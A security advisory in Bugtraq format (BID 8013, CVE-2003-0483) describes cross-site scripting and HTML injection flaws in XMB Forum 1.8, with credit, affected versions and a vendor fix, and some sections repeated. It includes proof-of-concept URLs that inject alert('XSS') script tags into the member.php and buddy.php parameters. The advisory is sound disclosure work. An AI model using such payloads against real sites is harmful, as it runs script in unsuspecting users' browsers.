XMB Forum Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
BID:8013
Info
XMB Forum Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
| Bugtraq ID: | 8013 |
| Class: | Input Validation Error |
| CVE: |
CVE-2003-0483 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 23 2003 12:00AM |
| Updated: | Sep 11 2008 07:10PM |
| Credit: | Discovery of this vulnerability has been credited to Knight Commander <[email protected]>. |
| Vulnerable: |
XMB Forum 1.8 SP1 XMB Forum 1.8 |
| Not Vulnerable: |
XMB Forum 1.9.8 SP2 |
Discussion
XMB Forum Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
XMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data.
An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user.
XMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data.
An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user.
Exploit / POC
XMB Forum Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
The following proof of concept has been supplied:
http://www.example.com/XMBforum/member.phpaction=viewpro&member=admin&lt;script&gt;alert('XSS')&lt;/script&gt;
http://www.example.com/XMBforum/buddy.php?action=&lt;script&gt;alert('XSS')&lt;/script&gt;&buddy=&lt;script&gt;alert('XSS')&lt;/script&gt;
The following proof of concept has been supplied:
http://www.example.com/XMBforum/member.phpaction=viewpro&member=admin&lt;script&gt;alert('XSS')&lt;/script&gt;
http://www.example.com/XMBforum/buddy.php?action=&lt;script&gt;alert('XSS')&lt;/script&gt;&buddy=&lt;script&gt;alert('XSS')&lt;/script&gt;
Solution / Fix
XMB Forum Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
Solution:
A vendor update is available. Contact the vendor for more information.
Solution:
A vendor update is available. Contact the vendor for more information.
References
XMB Forum Multiple Cross-Site Scripting And HTML Injection Vulnerabilities
References:
References:
- Summary of Official Vendor Statements (XMB)
- XMB Forum Home Page (The XMB Group)
- Many XSS Vulnerabilities in XMB Forum. (Knight Commander
)